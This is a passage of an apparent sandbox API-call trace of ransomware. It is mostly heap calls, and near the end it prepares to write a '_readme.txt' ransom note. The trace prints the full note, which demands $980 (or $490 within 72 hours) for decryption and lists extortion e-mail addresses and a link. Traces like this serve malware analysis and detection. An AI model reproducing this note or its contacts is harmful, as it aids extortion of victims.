dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.339] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0174.340] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.340] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.340] PathFindFileNameW (pszPath="") returned="" [0174.340] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.341] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.341] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.341] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.342] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0174.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.342] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0174.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.343] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.343] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.343] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 